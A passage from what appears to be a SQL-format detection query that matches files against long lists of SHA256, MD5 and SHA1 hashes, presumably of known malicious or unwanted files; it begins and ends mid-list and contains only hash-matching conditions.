'%SHA256=436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374%' ESCAPE '\\' OR Hashes LIKE '%SHA256=81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41%' ESCAPE '\\' OR Hashes LIKE '%SHA256=06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80%' ESCAPE '\\' OR Hashes LIKE '%SHA256=314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414%' ESCAPE '\\' OR Hashes LIKE '%SHA256=dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22%' ESCAPE '\\' OR Hashes LIKE '%SHA256=221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508%' ESCAPE '\\' OR Hashes LIKE '%SHA256=78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af%' ESCAPE '\\' OR Hashes LIKE '%SHA256=58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495%' ESCAPE '\\' OR Hashes LIKE '%SHA256=dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21%' ESCAPE '\\' OR Hashes LIKE '%SHA256=91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499%' ESCAPE '\\' OR Hashes LIKE '%SHA256=509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35%' ESCAPE '\\' OR Hashes LIKE '%SHA256=927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b%' ESCAPE '\\') OR md5 IN ('1b5c3c458e31bede55145d0644e88d75', '6f5d54ab483659ac78672440422ae3f1', 'ee6b1a79cb6641aa44c762ee90786fe0', 'c02f70960fa934b8defa16a03d7f6556', '839cbbc86453960e9eb6db814b776a40', 'acac842a46f3501fe407b1db1b247a0b', '95e4c7b0384da89dce8ea6f31c3613d9', 'e700a820f117f65e813b216fccbf78c9', '96b463b6fa426ae42c414177af550ba2', '27bcbeec8a466178a6057b64bef66512', '70dcd07d38017b43f710061f37cb4a91', 'db72def618cbc3c5f9aa82f091b54250', '83601bbe5563d92c1fdb4e960d84dc77', '5970e8de1b337ca665114511b9d10806', '49fe3d1f3d5c2e50a0df0f6e8436d778', '1493d342e7a36553c56b2adea150949e', '4f191abc652d8f7442ca2636725e1ed6', '0ae30291c6cbfa7be39320badd6e8de0', 'd104621c93213942b7b43d65b5d8d33e', 'b89b097b8b8aecb8341d05136f334ebb', '14580bd59c55185115fd3abe73b016a2', '992ded5b623be3c228f32edb4ca3f2d2', 'a26e600652c33dd054731b4693bf5b01', '1f950cfd5ed8dd9de3de004f5416fe20', '491aec2249ad8e2020f9f9b559ab68a8', 'e4266262a77fffdea2584283f6c4f51d', 'bd25be845c151370ff177509d95d5add', '9638f265b1ddd5da6ecdf5c0619dcbe6', '4e90cd77509738d30d3181a4d0880bfa', '0a6a1c9a7f80a2a5dcced5c4c0473765', '9aa7ed7809eec0d8bc6c545a1d18107a', 'aa1ed3917928f04d97d8a217fe9b5cb1', '42f7cc4be348c3efd98b0f1233cf2d69', '4cc3ddd5ae268d9a154a426af2c23ef9', '2fed983ec44d1e7cffb0d516407746f2', 'f7cbbb5eb263ec9a35a1042f52e82ca4', 'ed6348707f177629739df73b97ba1b6e', '40bc58b7615d00eb55ad9ba700c340c1', 'c3fea895fe95ea7a57d9f4d7abed5e71', '2128e6c044ee86f822d952a261af0b48', '3dbf69f935ea48571ea6b0f5a2878896', 'c6f8983dd3d75640c072a8459b8fa55a', '6fcf56f6ca3210ec397e55f727353c4a', '79f7e6f98a5d3ab6601622be4471027f', 'bae1f127c4ff21d8fe45e2bbfc59c180', 'c533d6d64b474ffc3169a0e0fc0a701a', '3f39f013168428c8e505a7b9e6cba8a2', '748cf64b95ca83abc35762ad2c25458f', 'bce7f34912ff59a3926216b206deb09f', '2d8e4f38b36c334d0a32a7324832501d', '47e6ac52431ca47da17248d80bf71389', '3651a6990fe38711ebb285143f867a43', 'dc943bf367ae77016ae399df8e71d38a', '02198692732722681f246c1b33f7a9d9', 'ddc2ffe0ab3fcd48db898ab13c38d88d', '0ec361f2fba49c73260af351c39ff9cb', 'c1fce7aac4e9dd7a730997e2979fa1e2', '49938383844ceec33dba794fb751c9a5', '34069a15ae3aa0e879cd0d81708e4bcc', '1c294146fc77565030603878fd0106f9', 'fd81af62964f5dd5eb4a828543a33dcf', 'bd5b0514f3b40f139d8079138d01b5f6', 'fa173832dca1b1faeba095e5c82a1559', '5cc5c26fc99175997d84fe95c61ab2c2', '1ed043249c21ab201edccb37f1d40af9', '361a598d8bb92c13b18abb7cac850b01', '9b359b722ac80c4e0a5235264e1e0156', '296bde4d0ed32c6069eb90c502187d0d', 'd3e40644a91327da2b1a7241606fe559', '12cecc3c14160f32b21279c1a36b8338', 'dd39a86852b498b891672ffbcd071c03', 'b2a9ac0600b12ec9819e049d7a6a0b75', '444f538daa9f7b340cfd43974ed43690', '7b43dfd84de5e81162ebcfafb764b769', '13dda15ef67eb265869fc371c72d6ef0', '300c5b1795c9b6cc1bc4d7d55c7bbe85', '1392b92179b07b672720763d9b1028a5', '2e1f8a2a80221deb93496a861693c565', '8065a7659562005127673ac52898675f', 'b5ada7fd226d20ec6634fc24768f9e22', '84fb76ee319073e77fb364bbbbff5461', 'daf800da15b33bf1a84ee7afc59f0656', 'f7393fb917aed182e4cbef25ce8af950', '120b5bbb9d2eb35ff4f62d79507ea63a', '73c98438ac64a68e88b7b0afd11ba140', '51207adb8dab983332d6b22c29fe8129', '4a23e0f2c6f926a41b28d574cbc6ac30', '20125794b807116617d43f02b616e092', 'e8ebba56ea799e1e62748c59e1a4c586', '8abbb12e61045984eda19e2dc77b235e', 'f66b96aa7ae430b56289409241645099', '97e3a44ec4ae58c8cc38eefc613e950e', 'ff7b31fa6e9ab923bce8af31d1be5bb2', '12908c285b9d68ee1f39186110df0f1e', '6126065af2fc2639473d12ee3c0c198e', '356bda2bf0f6899a2c08b2da3ec69f13', 'fd7de498a72b2daf89f321d23948c3c4', '338a98e1c27bc76f09331fcd7ae413a5', 'c9a293762319d73c8ee84bcaaf81b7b3', 'e9e786bdba458b8b4f9e93d034f73d00', 'a17c58c0582ee560c72f60764ed63224', '21e13f2cb269defeae5e1d09887d47bb', 'a57b47489febc552515778dd0fd1e51c', 'd6e9f6c67d9b3d790d592557a7d57c3c', '76bb1a4332666222a8e3e1339e267179', '1cd158a64f3d886357535382a6fdad75', 'd9e7e5bcc5b01915dbcef7762a7fc329', 'd253c19194a18030296ae62a10821640', 'b12d1630fd50b2a21fd91e45d522ba3a', '50b39072d0ee9af5ef4824eca34be6e3', '778b7feea3c750d44745d3bf294bd4ce', '0761c357aed5f591142edaefdf0c89c8', '23cf3da010497eb2bf39a5c5a57e437c', 'c49a1956a6a25ffc25ad97d6762b0989', 'f406c5536bcf9bacbeb7ce8a3c383bfa', 'f2f728d2f69765f5dfda913d407783d2', '4b817d0e7714b9d43db43ae4a22a161e', '715f8efab1d1c660e4188055c4b28eed', 'a01c412699b6f21645b2885c2bae4454', '010c0e5ac584e3ab97a2daf84cf436f5', 'd5db81974ffda566fa821400419f59be', '3247014ba35d406475311a2eab0c4657', '4d487f77be4471900d6ccbc47242cc25', '1f2888e57fdd6aee466962c25ba7d62d', '507a649eb585d8d0447eab0532ef0c73', '4ad8fd9e83d7200bd7f8d0d4a9abfb11', 'cd9f0fcecf1664facb3671c0130dc8bb', 'b10b210c5944965d0dc85e70a0b19a42', 'ae5eb2759305402821aeddc52ba9a6d6', 'f5051c756035ef5de9c4c48bacb0612b', '1898ceda3247213c084f43637ef163b3', '37086ae5244442ba552803984a11d6cb', '825703c494e0d270f797f1ecf070f698', '909f3fc221acbe999483c87d9ead024a', '75d6c3469347de1cdfa3b1b9f1544208', '9ab9f3b75a2eb87fafb1b7361be9dfb3', '5f9785e7535f8f602cb294a54962c9e7', '7d46d0ddaf8c7e1776a70c220bf47524', 'f9844524fb0009e5b784c21c7bad4220', '828bb9cb1dd449cd65a29b18ec46055f', '4d17b32be70ef39eae5d5edeb5e89877', '2391fb461b061d0e5fccb050d4af7941', '6d4159694e1754f262e326b52a3b305a', 'a60c9173563b940203cf4ad38ccf2082', '63e333d64a8716e1ae59f914cb686ae8', 'a9f220b1507a3c9a327a99995ff99c82', 'c5f5d109f11aadebae94c77b27cb026f', '5bab40019419a2713298a5c9173e5d30', 'c996d7971c49252c582171d9380360f2', '98763a3dee3cf03de334f00f95fc071a', 'e79c91c27df3eaf82fb7bd1280172517', 'a42249a046182aaaf3a7a7db98bfa69d', '803a371a78d528a44ef8777f67443b16', '9007c94c9d91ccff8d7f5d4cdddcc403', '11fb599312cb1cf43ca5e879ed6fb71e', '7f9309f5e4defec132b622fadbcad511', '04a88f5974caa621cee18f34300fc08a', '8636fe3724f2bcba9399daffd6ef3c7e', '9dfd73dadb2f1c7e9c9d2542981aaa63', '490b1f404c4f31f4538b36736c990136', 'c1d063c9422a19944cdaa6714623f2ec', 'dacb62578b3ea191ea37486d15f4f83c', '2da209dde8188076a9579bd256dc90d0', '0ba6afe0ea182236f98365bd977adfdf', '4c016fd76ed5c05e84ca8cab77993961', 'ad22a7b010de6f9c6f39c350a471a440', '79483cb29a0c428e1362ec8642109eee', 'a179c4093d05a3e1ee73f6ff07f994aa', 'ccf523b951afaa0147f22e2a7aae4976', '736c4b85ce346ddf3b49b1e3abb4e72a', 'b0baac4d6cbac384a633c71858b35a2e', '798de15f187c1f013095bbbeb6fb6197', 'a86150f2e29b35369afa2cafd7aa9764', 'b941c8364308990ee4cc6eadf7214e0f', 'dd04cd3de0c19bede84e9c95a86b3ca8', '6909b5e86e00b4033fedfca1775b0e33', '9b91a44a488e4d539f2e55476b216024', '8b287636041792f640f92e77e560725e', '07f83829e7429e60298440cd1e601a6a', '0395b4e0eb21693590ad1cfdf7044b8b', '4b058945c9f2b8d8ebc485add1101ba5', '0067c788e1cb174f008c325ebde56c22', 'c2c1b8c00b99e913d992a870ed478a24', '84ba7af6ada1b3ea5efb9871a0613fc6', 'dbc415304403be25ac83047c170b0ec2', '31469f1313871690e8dc2e8ee4799b22', '2d465b4487dc81effaa84f122b71c24f', '64efbffaa153b0d53dc1bccda4279299', 'b164daf106566f444dfb280d743bc2f7', '7c72a7e1d42b0790773efd8700e24952', '56a515173b211832e20fbc64e5a0447c', 'c2eb4539a4f6ab6edd01bdc191619975', 'd1bac75205c389d6d5d6418f0457c29b', '68dde686d6999ad2e5d182b20403240b', 'a785b3bc4309d2eb111911c1b55e793f', '6ab7b8ef0c44e7d2d5909fdb58d37fa5', 'd9ce18960c23f38706ae9c6584d9ac90', 'ab53d07f18a9697139ddc825b466f696', 'ba5f0f6347780c2ed911bbf888e75bef', '13ee349c15ee5d6cf640b3d0111ffc0e', '9a237fa07ce3ed06ea924a9bed4a6b99', 'fa222bed731713904320723b9c085b11', '0898af0888d8f7a9544ef56e5e16354e', 'e076dadf37dd43a6b36aeed957abee9e', '4f27c09cc8680e06b04d6a9c34ca1e08', '1b32c54b95121ab1683c7b83b2db4b96', '715572dfe6fb10b16f980bfa242f3fa5', '4a06bcd96ef0b90a1753a805b4235f28', 'f242cffd9926c0ccf94af3bf16b6e527', '7ed6030f14e66e743241f2c1fa783e69', '0d6fef14f8e1ce5753424bd22c46b1ce', 'a4fda97f452b8f8705695a729f5969f7', '62c18d61ed324088f963510bae43b831', 'd5a642329cce4df94b8dc1ba9660ae34', 'a641e3dccba765a10718c9cb0da7879e', 'ed07f1a8038596574184e09211dfc30f', '3473faea65fba5d4fbe54c0898a3c044', '708ac9f7b12b6ca4553fd8d0c7299296', 'bbe4f5f8b0c0f32f384a83ae31f49a00', '257483d5d8b268d0d679956c7acdf02d', '312e31851e0fc2072dbf9a128557d6ef', '14eead4d42728e9340ec8399a225c124', 'de1cc5c266140bff9d964fab87a29421', '9a9dbf5107848c254381be67a4c1b1dd', '1dc94a6a82697c62a04e461d7a94d0b0', '2850608430dd089f24386f3336c84729', '6d131a7462e568213b44ef69156f10a5', 'b8b6686324f7aa77f570bc019ec214e6', '22823fed979903f8dfe3b5d28537eb47', 'c1d3a6bb423739a5e781f7eee04c9cfd', '0c0195c48b6b8582fa6f6373032118da', '5228b7a738dc90a06ae4f4a7412cb1e9', '62f02339fe267dc7438f603bfb5431a1', '22949977ce5cd96ba674b403a9c81285', '5ca1922ed5ee2b533b5f3dd9be20fd9a', '1ed08a6264c5c92099d6d1dae5e8f530', 'b0770094c3c64250167b55e4db850c04', 'a6e9d6505f6d2326a8a9214667c61c67', '8407ddfab85ae664e507c30314090385', '9321a61a25c7961d9f36852ecaa86f55', 'a711e6ab17802fabf2e69e0cd57c54cd', '29ccff428e5eb70ae429c3da8968e1ec', '79df0eabbf2895e4e2dae15a4772868c', 'fb7c61ef427f9b2fdff3574ee6b1819b', 'f778489c7105a63e9e789a02412aaa5f', 'fef9dd9ea587f8886ade43c1befbdafe', '43830326cd5fae66f5508e27cbec39a0', 'c7a57cd4bea07dadba2e2fb914379910', 'f1e054333cc40f79cfa78e5fbf3b54c2', 'dc564bac7258e16627b9de0ce39fae25', '054299e09cea38df2b84e6b29348b418', '97221e16e7a99a00592ca278c49ffbfc', '8d63e1a9ff4cafee1af179c0c544365c', '96421b56dbda73e9b965f027a3bda7ba', '4ae55080ec8aed49343e40d08370195c', '988dabdcf990b134b0ac1e00512c30c4', 'bbbc9a6cc488cfb0f6c6934b193891eb', '76c643ab29d497317085e5db8c799960', 'e9a30edef1105b8a64218f892b2e56ed', '7bd840ff7f15df79a9a71fec7db1243e', '1cff7b947f8c3dea1d34dc791fc78cdc', '2c54859a67306e20bfdc8887b537de72', 'a5f637d61719d37a5b4868c385e363c0', '2509a71a02296aa65a3428ddfac22180', '6cce5bb9c8c2a8293df2d3b1897941a2', '7a16fca3d56c6038c692ec75b2bfee15', 'eaea9ccb40c82af8f3867cd0f4dd5e9d', 'd2588631d8aae2a3e54410eaf54f0679', 'b47dee29b5e6e1939567a926c7a3e6a4', 'fac8eb49e2fd541b81fcbdeb98a199cb', '1a234f4643f5658bab07bfa611282267', '0752f113d983030939b4ab98b0812cf0') OR sha1 IN ('f0c463d29a5914b01e4607889094f1b7d95e7aaf', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '684786de4b3b3f53816eae9df5f943a22c89601f', '745335bcdf02fb42df7d890a24858e16094f48fd', '25d812a5ece19ea375178ef9d60415841087726e', 'd417c0be261b0c6f44afdec3d5432100e420c3ed', '6afc6b04cf73dd461e4a4956365f25c1f1162387', '01a578a3a39697c4de8e3dab04dba55a4c35163e', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', '7e836dadc2e149a0b758c7e22c989cbfcce18684', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'bc2f3850c7b858340d7ed27b90e63b036881fd6c', 'e22495d92ac3dcae5eeb1980549a9ead8155f98a', 'c969f1f73922fd95db1992a5b552fbc488366a40', '4c18754dca481f107f0923fb8ef5e149d128525d', '2fc6845047abcf2a918fce89ab99e4955d08e72c', '4f7a8e26a97980544be634b26899afbefb0a833c', '21edff2937eb5cd6f6b0acb7ee5247681f624260', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '6c1bb3a72ebfb5359b9e22ca44d0a1ff825a68f2', '064de88dbbea67c149e779aac05228e5405985c7', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '55ab7e27412eca433d76513edc7e6e03bcdd7eda', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', 'a6816949cd469b6e5c35858d19273936fab1bef6', '91f832f46e4c38ecc9335460d46f6f71352cffed', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '01779ee53f999464465ed690d823d160f73f10e7', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', '27d3ebea7655a72e6e8b95053753a25db944ec0f', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', '10115219e3595b93204c70eec6db3e68a93f3144', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '2c27abbbbcf10dfb75ad79557e30ace5ed314df8', '10e15ba8ff8ed926ddd3636cec66a0f08c9860a4', '291b4a88ffd2ac1d6bf812ecaedc2d934dc503cb', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', 'a7948a4e9a3a1a9ed0e4e41350e422464d8313cd', '19bd488fe54b011f387e8c5d202a70019a204adf', 'eeff4ec4ebc12c6acd2c930dc2eaaf877cfec7ec', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', 'd02403f85be6f243054395a873b41ef8a17ea279', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '4789b910023a667bee70ff1f1a8f369cffb10fe8', '50e2bc41f0186fdce970b80e2a2cb296353af586', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', 'e039c9dd21494dbd073b4823fc3a17fbb951ec6c', '806832983bb8cb1e26001e60ea3b7c3ade4d3471', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', 'a3ed5cbfbc17b58243289f3cf575bf04be49591d', '7fb52290883a6b69a96d480f2867643396727e83', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', 'da9cea92f996f938f699902482ac5313d5e8b28e', 'dc7b022f8bd149efbcb2204a48dce75c72633526', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '51b60eaa228458dee605430aae1bc26f3fc62325', 'c6bd965300f07012d1b651a9b8776028c45b149a', '729a8675665c61824f22f06c7b954be4d14b52c4', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'e4436c8c42ba5ffabd58a3b2256f6e86ccc907ab', '7ba19a701c8af76988006d616a5f77484c13cb0a', '25bf4e30a94df9b8f8ab900d1a43fd056d285c9d', 'd8498707f295082f6a95fd9d32c9782951f5a082', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '943593e880b4d340f2548548e6e673ef6f61eed3', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '4a7d66874a0472a47087fabaa033a85d47413379', '012db3a80faf1f7f727b538cbe5d94064e7159de', '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4', 'c6d349823bbb1f5b44bae91357895dba653c5861', '643383938d5e0d4fd30d302af3e9293a4798e392', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '1d0df45ee3fa758f0470e055915004e6eae54c95', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', 'd5fd9fe10405c4f90235e583526164cd0902ed86', '0c74d09da7baf7c05360346e4c3512d0cd433d59', '9c256edd10823ca76c0443a330e523027b70522d', '65d8a7c2e867b22d1c14592b020c548dd0665646', '7859e75580570e23a1ef7208b9a76f81738043d5', 'b242b0332b9c9e8e17ec27ef10d75503d20d97b6', '6523b3fd87de39eb5db1332e4523ce99556077dc', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'fe10018af723986db50701c8532df5ed98b17c39', 'b9807b8840327c6d7fbdde45fc27de921f1f1a82', 'a3636986cdcd1d1cb8ab540f3d5c29dcc90bb8f0', '054a50293c7b4eea064c91ef59cf120d8100f237', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', '485c0b9710a196c7177b99ee95e5ddb35b26ddd1', 'faa870b0cb15c9ac2b9bba5d0470bd501ccd4326', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', '0291d0457acaf0fe8ed5c3137302390469ce8b35', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', '5a7dd0da0aee0bdedc14c1b7831b9ce9178a0346', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '19f3343bfad0ef3595f41d60272d21746c92ffca', 'a48aa80942fc8e0699f518de4fd6512e341d4196', 'f6f11ad2cd2b0cf95ed42324876bee1d83e01775', '9a35ae9a1f95ce4be64adc604c80079173e4a676', 'ea360a9f23bb7cf67f08b88e6a185a699f0c5410', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', '08596732304351b311970ff96b21f451f23b1e25', '29a190727140f40cea9514a6420f5a195e36386b', 'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', '31fac347aa26e92db4d8c9e1ba37a7c7a2234f08', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', 'f052dc35b74a1a6246842fbb35eb481577537826', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'a7d827a41b2c4b7638495cd1d77926f1ba902978', 'c23eeb6f18f626ce1fd840227f351fa7543bb167', '3805e4e08ad342d224973ecdade8b00c40ed31be', '8302802b709ad242a81b939b6c90b3230e1a1f1e', 'ac13941f436139b909d105ad55637e1308f49d9a', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '623cd2abef6c92255f79cbbd3309cb59176771da', 'af50109b112995f8c82be8ef3a88be404510cdde', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '7eec3a1edf3b021883a4b5da450db63f7c0afeeb', '078ae07dec258db4376d5a2a05b9b508d68c0123', 'ef80da613442047697bec35ea228cde477c09a3d', '6003184788cd3d2fc624ca801df291ccc4e225ee', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '877c6c36a155109888fe1f9797b93cb30b4957ef', 'f3cce7e79ab5bd055f311bb3ac44a838779270b6', '80fa962bdfb76dfcb9e5d13efc38bb3d392f2e77', '3b6b35bca1b05fafbfc883a844df6d52af44ccdc', '351cbd352b3ec0d5f4f58c84af732a0bf41b4463', '609fa1efcf61e26d64a5ceb13b044175ab2b3a13', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '71469dce9c2f38d0e0243a289f915131bf6dd2a8', '05ac1c64ca16ab0517fe85d4499d08199e63df26', '2261198385d62d2117f50f631652eded0ecc71db', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', 